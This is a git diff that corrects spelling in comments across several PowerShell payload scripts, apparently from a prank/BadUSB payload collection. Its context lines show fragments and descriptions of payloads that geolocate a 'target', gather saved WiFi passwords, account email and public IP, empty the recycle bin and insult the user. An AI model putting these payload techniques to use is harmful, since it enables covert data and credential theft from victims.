diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 index 9e64302..0cfd353 100644 --- a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 +++ b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 @@ -86,7 +86,7 @@ function Get-GeoLocation{ try { Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object - $GeoWatcher.Start() #Begin resolving current locaton + $GeoWatcher.Start() #Begin resolving current location while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { Start-Sleep -Milliseconds 100 #Wait for discovery. @@ -95,7 +95,7 @@ function Get-GeoLocation{ if ($GeoWatcher.Permission -eq 'Denied'){ Write-Error 'Access Denied for Location Information' } else { - $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. + $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results. } } # Write Error is just for troubleshooting diff --git a/Payloads/Flip-AcidBurn/AcidBurn.ps1 b/Payloads/Flip-AcidBurn/AcidBurn.ps1 index c9e711e..e5cb3a0 100644 --- a/Payloads/Flip-AcidBurn/AcidBurn.ps1 +++ b/Payloads/Flip-AcidBurn/AcidBurn.ps1 @@ -19,12 +19,12 @@ <# .NOTES - This script was not optimized to shorten the code. This script is intended to have as much readablility as possible for new coders to learn. + This script was not optimized to shorten the code. This script is intended to have as much readability as possible for new coders to learn. .DESCRIPTION This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account. The SSID and WiFi password of any current or previously connected to networks. - It determines the last day they changed thier password and how many days ago. + It determines the last day they changed their password and how many days ago. Once the information is gathered the script will pause until a mouse movement is detected Then the script uses Sapi speak to roast their set up and lack of security #> @@ -464,7 +464,7 @@ echo "All Wifi Passes Done" $days = [int]$DateArray[0] } - # If no password set date is detected funtion will return $null to cancel Sapi Speak + # If no password set date is detected function will return $null to cancel Sapi Speak # Write Error is just for troubleshooting catch {Write-Error "Day password set not found" @@ -612,9 +612,9 @@ $blinks = 3;$o=New-Object -ComObject WScript.Shell;for ($num = 1 ; $num -le $bli Then the script will be paused until the mouse is moved script will check mouse position every indicated number of seconds This while loop will constantly check if the mouse has been moved - "CAPSLOCK" will be continously pressed to prevent screen from turning off + "CAPSLOCK" will be continuously pressed to prevent screen from turning off it will then sleep for the indicated number of seconds and check again - when mouse is moved it will break out of the loop and continue theipt + when mouse is moved it will break out of the loop and continue the script #> @@ -691,7 +691,7 @@ Clear-RecycleBin -Force -ErrorAction SilentlyContinue #---------------------------------------------------------------------------------------------------- -# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off +# This script repeatedly presses the capslock button, this snippet will make sure capslock is turned back off Add-Type -AssemblyName System.Windows.Forms $caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') diff --git a/Payloads/Flip-JumpScare/JumpScare.ps1 b/Payloads/Flip-JumpScare/JumpScare.ps1 index 852710c..173ff72 100644 --- a/Payloads/Flip-JumpScare/JumpScare.ps1 +++ b/Payloads/Flip-JumpScare/JumpScare.ps1 @@ -204,7 +204,7 @@ Clear-RecycleBin -Force -ErrorAction SilentlyContinue #---------------------------------------------------------------------------------------------------- -# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off +# This script repeatedly presses the capslock button, this snippet will make sure capslock is turned back off Add-Type -AssemblyName System.Windows.Forms $caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') diff --git a/Payloads/Flip-PS-Draw/PS-Custom-Draw.ps1 b/Payloads/Flip-PS-Draw/PS-Custom-Draw.ps1 index 12d83e8..d1e001a 100644 --- a/Payloads/Flip-PS-Draw/PS-Custom-Draw.ps1 +++ b/Payloads/Flip-PS-Draw/PS-Custom-Draw.ps1 @@ -194,9 +194,9 @@ echo "Hello $fullName" Then the script will be paused until the mouse is moved script will check mouse position every indicated number of seconds This while loop will constantly check if the mouse has been moved - "CAPSLOCK" will be continously pressed to prevent screen from turning off + "CAPSLOCK" will be continuously pressed to prevent screen from turning off it will then sleep for the indicated number of seconds and check again - when mouse is moved it will break out of the loop and continue theipt + when mouse is moved it will break out of the loop and continue the script #> diff --git a/Payloads/Flip-PS-Draw/PS-Draw.ps1 b/Payloads/Flip-PS-Draw/PS-Draw.ps1 index af92497..7f3358e 100644 --- a/Payloads/Flip-PS-Draw/PS-Draw.ps1 +++ b/Payloads/Flip-PS-Draw/PS-Draw.ps1 @@ -20,7 +20,7 @@ <# .NOTES This script will convert an approximation of what your image should look like. Most likely you'll need to test several images to find one that works - well. It is best to use images no larger than 150x150 pixels, but I would even recommend going smaller than that. My exmaple image is 25x20 pixels + well. It is best to use images no larger than 150x150 pixels, but I would even recommend going smaller than that. My example image is 25x20 pixels To increase the size of the pixels add more spaces to the following Write-Host command. Write-Host " " -NoNewline -BackgroundColor $BackGround @@ -161,9 +161,9 @@ echo "Hello $fullName" Then the script will be paused until the mouse is moved script will check mouse position every indicated number of seconds This while loop will constantly check if the mouse has been moved - "CAPSLOCK" will be continously pressed to prevent screen from turning off + "CAPSLOCK" will be continuously pressed to prevent screen from turning off it will then sleep for the indicated number of seconds and check again - when mouse is moved it will break out of the loop and continue theipt + when mouse is moved it will break out of the loop and continue the script #> diff --git a/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 b/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 index cab90f1..bcecf30 100644 --- a/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 +++ b/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 @@ -34,7 +34,7 @@ Add-Type -AssemblyName System.Windows.Forms $cycles = 3 -# List as many questions here as you like, it will cycke through all of them +# List as many questions here as you like, it will cycle through all of them $msgs = @( "Are all scammers as dumb as you?" diff --git a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 b/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 index 9e758a2..e072db9 100644 --- a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 +++ b/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 @@ -75,14 +75,14 @@ echo "`nYour computer is not very secure" >> $Env:temp\foo.txt <# .NOTES - This is to get the current Latitide and Longitude of your target + This is to get the current Latitude and Longitude of your target #> function Get-GeoLocation{ try { Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object - $GeoWatcher.Start() #Begin resolving current locaton + $GeoWatcher.Start() #Begin resolving current location while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { Start-Sleep -Milliseconds 100 #Wait for discovery. @@ -91,7 +91,7 @@ function Get-GeoLocation{ if ($GeoWatcher.Permission -eq 'Denied'){ Write-Error 'Access Denied for Location Information' } else { - $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. + $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results. } } @@ -168,7 +168,7 @@ if ($PubIP) { echo "`nYour Public IP: $PubIP" >> $Env:temp\foo.txt } } - # If no password set date is detected funtion will return $null to cancel Sapi Speak + # If no password set date is detected function will return $null to cancel Sapi Speak # Write Error is just for troubleshooting catch {Write-Error "Day password set not found" diff --git a/Payloads/Flip-We-Found-You/found-you.ps1 b/Payloads/Flip-We-Found-You/found-you.ps1 index 23514fa..04d04fe 100644 --- a/Payloads/Flip-We-Found-You/found-you.ps1 +++ b/Payloads/Flip-We-Found-You/found-you.ps1 @@ -27,7 +27,7 @@ .DESCRIPTION This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account. The SSID and WiFi password of any current or previously connected to networks. - It determines the last day they changed thier password and how many days ago. + It determines the last day they changed their password and how many days ago. Once the information is gathered the script will pause until a mouse movement is detected Then the script uses Sapi speak to roast their set up and lack of security #> @@ -67,7 +67,7 @@ $FN = Get-fullName <# .NOTES - This is to get the current Latitide and Longitude of your target + This is to get the current Latitude and Longitude of your target #> function Get-GeoLocation{ @@ -83,7 +83,7 @@ function Get-GeoLocation{ if ($GeoWatcher.Permission -eq 'Denied'){ Write-Error 'Access Denied for Location Information' } else { - $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. + $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results. } }